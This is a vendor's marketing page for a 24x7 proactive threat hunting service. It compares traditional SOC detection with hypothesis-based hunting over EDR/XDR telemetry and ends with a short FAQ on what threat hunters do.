Cyber threat hunting services

Cyber threat hunting services

Improves detection efficiency and cyber threat responses

Contact

Did you know that the average detection time of an incident/security breach is 200 days? Did you know that once it is detected it takes an average of 66 days to contain the incident? This shows that the current detection and response mechanisms are not sufficient.

Although the majority of the field is talking about threat hunting when explaining detection mechanisms, the reality is that very few have developed an accurate hunting approach.

Why Proactive Threat Hunting?

We all are aware of organizations that are investing considerable amounts of resources into detecting advanced threats with no success. Some of them are even targeted by ransomware gangs because of the lack of having good detection and response capabilities.

This scenario is becoming more and more relevant as we are learning that classic Threat Detection capabilities are not enough. We need to evolve from traditional SOC to proactive Threat Hunting. This is achieved by focusing on TTPs analysis instead IOCs, by utilizing the Compromise Hypothesis instead of Reactive approach once a security event has been detected and more.

Traditional SOC

Threat Detection

Protects against a well-known attack.

Reactivity

The investigation stage of an alert or event.

Detection Stack

SIEM, IDS, FWs, Proxy technologies, among others.

Known attacks

Signature and IOC based detection.

Complex Start-Up

Deployment of technology, creation of use cases, source diversity, blind spots, configuration faults, alerts and false positives.

Advanced approach

Threat Hunting

New forms of attack are being investigated.

Proactivity

We are constantly investigating under an undetected breach scenario, assuming that a sophisticated attack has been produced and no security event has been triggered.

Telemetry & Deception

We collect and analyze activity from endpoints, servers and deception campaigns.

Targeted and Unknown Attacks

TPP, intelligence, tracking and hypothesis-based detection.

Easy Set-Up

Detection based on telemetry provided by EDR/XDR technology.

What Makes our Threat Hunting Approach so Unique?

Our 24x7 Proactive Threat Hunting service understands Malicious Adversaries better than a regular SOC, enabling the possibility to detect and respond to Malicious Operations even before a single security event has been made known. That can be accomplished because of our Proactive Threat Hunting service relies on the following fundamentals:

Technology Agnostic

Hunting over approved EDR/XDR

  • We are continuously analyzing new technology that allow us to perform a high-quality Threat Hunting service
  • To maintain our quality standards, only technologies that pass our internal evaluation are used

Offensive Mindset

Understanding adversaries

  • Even when there is not a proper detection from the technology, our experts can identify Malicious Operations from the telemetry
  • We use our Red Team as a Threat Hunting accelerator
  • We deploy our own Threat Hunting Intelligence™ on top of the EDR/XDR detection capabilities

Compromise Hypothesis

Proactive hunting

  • Our service is a never-ending effort to maintain a proactive hunting position while considering compromise hypothesis
  • Using compromise hypothesis allows us to detect unknown Malicious Actors
  • We perform thousands of custom queries to available telemetry every month to find unknown threats

World Class Team

Experts

  • Our hunters are real researchers thinking like real adversaries
  • We provide a cutting-edge service using the most innovative attacking techniques and detection bypass possibilities
  • We consult the most innovative technology to analyze emerging threats

Threat Hunting Intelligence ™ as a distinctive Threat Hunting accelerator

Threat Hunting Intelligence EDR/XDR gaps Threat actors Research Red team Malops Advisors

Our Threat Hunting service improved not only by continuous research on Malicious Operations, Threat Actors profiling or public advisories analysis, but also by improving detection capabilities when the threat is able to perform detection bypass techniques.

All those improvements are centralized in our Threat Hunting Intelligence™ and included in our unique Threat Hunting service.

Under this context, it is particularly relevant that our Red Teamis an excellent accelerator to improve our Threat Hunting service, and vice versa. In fact, having both services at the same time is a possibility that more and more clients are requesting. They request the following combined approach:

Red team Service

Our Red Team simulates threat actors, adversaries or cyber exercices to bypass defensive layers

We are continuously reporting improvement possibilities to the Threat Hunting team

Threat hunting Service

Our researchers are continuously learning from new techniques, tactics and procedures (TTPs) used by malicious actors and the learning process is accelerated by Red Team exercises

Overcoming the EDR/XDR detection capabilities

With the aim of performing an extraordinary Proactive Threat Hunting service, only extraordinary EDR/XDR solutions are accepted after intensive testing and evasion techniques performed in our lab.

In addition to the detection capabilities offered by EDR/XDR technology, our Threat Hunting service deploys additional detection capabilities by performing thousands of additional detection checks molded to every client environment.

*The technology approving process is a continuous evaluation of the most relevant EDR/XDR solutions so if using a technology not shown above, please contact us for further information.

crowdstrike sentinelone Microsoft_endpoint_defender Cortex

Threat hunting FAQs

What is threat hunting?

Threat Hunting is a service aimed to proactively detect advanced threats in corporate endpoints and networks by using compromise hypothesis approaches, as well as responding to the compromise.

What are the benefits of threat hunting?

Threat Hunting is strongly suggested to detect and respond in front of unknown threats. That can be accomplished because instead of focusing on Identificators of Compromise (IOC), Threat Hunting focuses on Mitre Techniques, Tactiques and Procedures (TTP) to detect Malicious Operations that could perform an APT when no IOC’s are available in advance.

What does a threat hunter do?

Threat Hunters activities need to cover the following activities:

  • Analyze suspicious detections performed by the EDR or XDR technology, including  investigations to confirm a malicious operation or discard false positives.
  • Threat research, which includes maintaining an updated knowledge about low level details on emerging critical vulnerabilities, exploits, APT, attacking campaigns, techniques, tactiques and procedures that a malicious actor could use to compromise an organization and its resources.
  • Transforming results from the researching activities into proactive hunting by exploiting the available data or telemetry.

What are the types of threat hunting?

Even when the objective is the same, Threat Hunting activities differ from traditional Threat Detection in the way they achieve those objectives. Some of the main differences can be summarized as:

  • Threat Hunting requires searching proactively for unknown threats, while Threat Detection is a reactive process initiated once an alert arises.
  • Threat Hunting analyzes TTP’s, while Threat Detection is focused on IOC’s or well-known patterns.

Threat Hunting is focused on analyzing data and telemetry provided by EDR or XDR technologies, while Threat Detection analyzes events and logs centralized in a SIEM.

What is a cyber hunt team?

The team performing Threat Hunting activities is based on tiers like a regular Threat Detection service. Instead of that, Threat Hunters are always very skilled professionals that know how an attack works under the hood so they can identify any malicious operation just by looking at the available resources like data and telemetry (even when there is no alert associated with the malicious operation).

Among the skills of a Threat Hunting team it can be highlighted (among others):

  • Vast experience in offensive techniques
  • An excellent understanding of Windows and Linux internals, as well as networking skills.
  • Malware reverse engineering
  • Continuous researching to know emerging offensive techniques
  • Supporting other teams involved in an Incident Response